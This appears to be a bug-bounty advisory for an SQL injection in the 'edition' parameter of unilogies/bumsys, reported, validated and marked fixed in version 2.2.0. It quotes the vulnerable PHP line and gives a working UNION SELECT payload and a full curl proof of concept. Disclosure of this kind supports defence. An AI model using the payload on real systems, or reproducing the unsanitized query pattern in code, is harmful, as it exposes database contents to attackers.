SQL Injection in 'core/ajax/ajax_data.php' in unilogies/bumsys

Valid

Reported on

Mar 1st 2023

Description

There exists an SQL injection affecting the edition parameter located in the file core/ajax/ajax_data.php

    $productEditionFilter = ( isset($_GET["edition"]) and !empty($_GET["edition"]) ) ? " product_edition = '{$_GET["edition"]}' " : " product_type != 'Child' ";

We see that $_GET["edition"] is appended unsanitized to part of the SQL query.

Fix

Properly sanitize the edition parameter.

Proof of Concept

Make a GET-request to http://bumsys.local/info?module=data&page=productList&edition=a'+union+all+select+1,version(),3%23 with a valid session and a valid CSRF-token and observe the output of the mysql version() function.

curl -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H 'Connection: keep-alive' -H 'Cookie: eid=1; __5604118335cb0000a84ea1f5b9befc7b8de1bc72=htcj0ak63hpr5olf9no7ta7itk; currencySymbol=%E0%A7%B3; keepAlive=1' -H 'X-CSRF-TOKEN: 60adf385871243969f091178dec627e96719915b' --url "http://bumsys.local/info?module=data&page=productList&edition=a'+union+all+select+1,version(),3%23"

Impact

Authenticated users are able to disclose the contents of the database.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
TsarSec modified the report
3 months ago
Khurshid Alam validated this vulnerability 3 months ago
TsarSec has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
ajax_data.php#L573 has been validated
to join this conversation